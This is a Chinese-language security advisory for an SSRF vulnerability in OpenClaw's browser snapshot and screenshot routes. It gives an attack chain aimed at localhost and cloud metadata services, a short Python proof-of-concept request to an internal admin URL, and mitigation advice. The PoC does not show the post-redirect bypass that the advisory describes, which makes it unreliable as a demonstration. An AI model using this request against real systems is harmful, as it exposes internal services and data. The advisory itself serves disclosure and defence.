CVE-2026-42436 CVSS 7.7 高危

CVE-2026-42436 OpenClaw访问控制漏洞致SSRF

披露日期: 2026-05-05

来源: [email protected]

漏洞信息

漏洞编号

CVE-2026-42436

漏洞类型

服务端请求伪造 (SSRF)

CVSS评分

7.7 高危

攻击向量

网络 (AV:N)

认证要求

低权限 (PR:L)

用户交互

无需交互 (UI:N)

影响产品

OpenClaw

漏洞概述

OpenClaw 2026.4.14之前的版本存在访问控制失效漏洞。攻击者利用已认证身份，可通过浏览器快照、截图及标签页路由发起请求。由于系统在导航后未持续验证最终目标，可绕过SSRF限制，访问内部或禁止的页面内容，导致敏感信息泄露。

技术细节

该漏洞的核心在于OpenClaw处理浏览器自动化任务时的逻辑缺陷。当攻击者调用快照或截图API时，系统仅对初始请求的URL进行了基础的SSRF检查，但在浏览器完成页面跳转（包括重定向或JavaScript跳转）后，未对最终渲染的URL进行二次策略校验。这使得经过身份验证的攻击者能够诱导浏览器访问内网敏感资源（如本地管理后台、云元数据服务等）。由于缺乏对最终目标的访问控制复核，系统会将内部页面的内容通过截图或快照形式返回，从而成功绕过SSRF防护机制。

攻击链分析

STEP 1

1. 获取凭证

攻击者获取OpenClaw平台的低权限用户账户凭证。

STEP 2

2. 构造恶意请求

攻击者向浏览器快照或截图接口发送请求，目标URL设定为内网敏感地址（如localhost或元数据服务）。

STEP 3

3. 浏览器导航

OpenClaw后端启动浏览器实例并导航至攻击者指定的URL。

STEP 4

4. 验证绕过

系统在导航完成后未对最终目标URL进行SSRF策略重新验证，直接进行渲染。

STEP 5

5. 获取敏感数据

系统截取内部页面的快照或截图并返回给攻击者，导致信息泄露。

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

# PoC for CVE-2026-42436
# Requires authentication (PR:L)

import requests

target = "http://127.0.0.1/admin" # Internal target
headers = {
    "Authorization": "Bearer <AUTH_TOKEN>",
    "Content-Type": "application/json"
}
payload = {
    "url": target,
    "route": "screenshot" # Vulnerable route
}

response = requests.post("http://target-openclaw/api/browser/snapshot", json=payload, headers=headers)

if response.status_code == 200:
    print("[+] Exploit successful. Internal content exposed.")
    print(response.text)
else:
    print("[-] Exploit failed.")

影响范围

OpenClaw < 2026.4.14

防御指南

临时缓解措施

建议立即升级至修复版本。若无法升级，应通过网络ACL限制OpenClaw实例对内网（如127.0.0.1、169.254.169.254等）的访问，或临时禁用相关的浏览器自动化功能接口。

参考链接

快速导航: 前沿安全最新收录域名列表最新威胁情报列表最新网站排名列表最新工具资源列表最新CVE漏洞列表